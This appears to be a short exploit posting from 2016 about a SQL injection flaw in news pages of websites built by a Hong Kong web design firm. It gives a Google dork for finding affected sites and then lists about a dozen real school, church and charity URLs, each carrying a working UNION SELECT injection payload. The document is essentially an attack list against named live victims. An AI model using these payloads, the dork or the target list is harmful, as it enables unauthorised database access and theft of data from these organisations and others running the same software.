######################
# Exploit Title : 科擎科技有限公司 (IGT) SQL injection Vulnerability
# Exploit Author : modiret
# Vendor Homepage : http://www.igears.net/
# Google Dork : intext:"網頁設計及維護 科擎科技有限公司" news_detail
# Date: 2016 14 January
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
# demos :
# http://www.choiming.edu.hk/news_detail.php?pkey=-15%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17--%20-
# http://www.gracefield.edu.hk/news_detail.php?p=-5+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15
# http://www.hkgamblers-recovery.org/news_detail.php?p=-12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20,21,22,23,24,25,26,27
# http://www.hkecss.org/news_detail.php?pkey=-42%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17--%20-
# http://www.ssbc.org.hk/news_detail.php?p=-19+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14
# http://www.xiyaosswkg.edu.hk/news_detail.php?p=-16+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16
# http://www.taktinur.edu.hk/news_detail.php?pkey=-236%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17--%20-
# http://www.reconnect.hk/news_detail.php?pkey=-31%27+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21,22,23,24--%20-
# http://www.ccchhktc.com/news_detail.php?pkey=-32%27+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15--%20-
# http://www.community-hkecss.org/news_detail.php?pkey=-111%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17--%20-
# http://www.yuenlongchurch.org/news_detail.php?p=-132+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13
# http://www.hknlc.org/news_detail.php?pkey=-70%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18--%20-
# http://www1.igears.com.hk/hkecss_sc/frontend/news_detail.php?pkey=-19%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17--%20-
######################
